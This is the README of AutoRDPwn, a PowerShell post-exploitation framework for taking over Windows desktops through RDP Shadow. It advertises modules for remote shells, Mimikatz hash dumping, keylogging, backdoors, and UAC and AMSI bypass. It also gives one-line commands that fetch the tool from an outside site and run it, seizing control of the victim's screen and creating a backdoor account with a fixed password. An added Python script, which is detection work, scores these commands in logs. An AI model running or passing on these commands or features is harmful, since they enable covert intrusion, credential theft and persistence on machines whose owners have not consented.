AutoRDPwn v5.0 - The Shadow Attack Framework


AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed usage guide can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva
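
For detection, the command shapes, parameters and default account name documented above leave recognisable strings in process-creation and account-creation logs. The following is an added example, not part of AutoRDPwn or the original page: a Python triage script that scores command lines against those documented strings. The event format, host names, placeholder URLs, weights and threshold are assumptions, and the sample events are constructed.

```python
import re

# Indicators drawn from the usage text above; the weights are assumptions.
INDICATORS = [
    ("exec_policy_bypass", re.compile(r"-e(?:p|x\w*)\s+bypass\b", re.I), 1),
    ("download_to_file", re.compile(r"\b(?:iwr|invoke-webrequest)\b.*-outfile\b", re.I), 1),
    ("script_name", re.compile(r"autordpwn\.ps1", re.I), 3),
    ("shadow_param", re.compile(r"-shadow\s+\w+", re.I), 2),
    ("createuser_param", re.compile(r"-createuser\b", re.I), 2),
    ("headless_params", re.compile(r"(?=.*-nogui\b)(?=.*-lang\b)", re.I), 1),
]
DEFAULT_ACCOUNT = "autordpwn"  # account name the -createuser option adds

def score_cmdline(cmdline):
    """Return (score, indicator names) for one process command line."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(cmdline)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def triage(events, threshold=3):
    """Flag process events at or above threshold and default-account creations."""
    alerts = []
    for ev in events:
        if ev["kind"] == "user_created":
            if ev["account"].lower() == DEFAULT_ACCOUNT:
                alerts.append((ev["host"], 3, ["default_account"]))
            continue
        score, names = score_cmdline(ev["cmdline"])
        if score >= threshold:
            alerts.append((ev["host"], score, names))
    return alerts

# Constructed sample events (hypothetical hosts, placeholder URLs), not real logs.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "WS01", "cmdline":
     r'powershell -ep bypass "cd $env:temp ; iwr https://example.invalid/a.php '
     r'-outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"'},
    {"kind": "process", "host": "SRV01", "cmdline":
     r"powershell.exe -ep bypass -File C:\Scripts\Rotate-Logs.ps1"},
    {"kind": "process", "host": "WS02", "cmdline":
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\u.ps1 "
     r"-noadmin -nogui -lang English -option 4 -shadow control -createuser"},
    {"kind": "process", "host": "WS03", "cmdline":
     r'powershell -c "iwr https://example.invalid/tool.zip -outfile tool.zip"'},
    {"kind": "user_created", "host": "SRV02", "account": "AutoRDPwn"},
]

if __name__ == "__main__":
    for host, score, names in triage(SAMPLE_EVENTS):
        print(f"{host}: score={score} indicators={','.join(names)}")
```

The script name, parameters and account name are the defaults from the text above, so a match is a strong signal while the absence of one proves little.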


Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper of Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them and their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net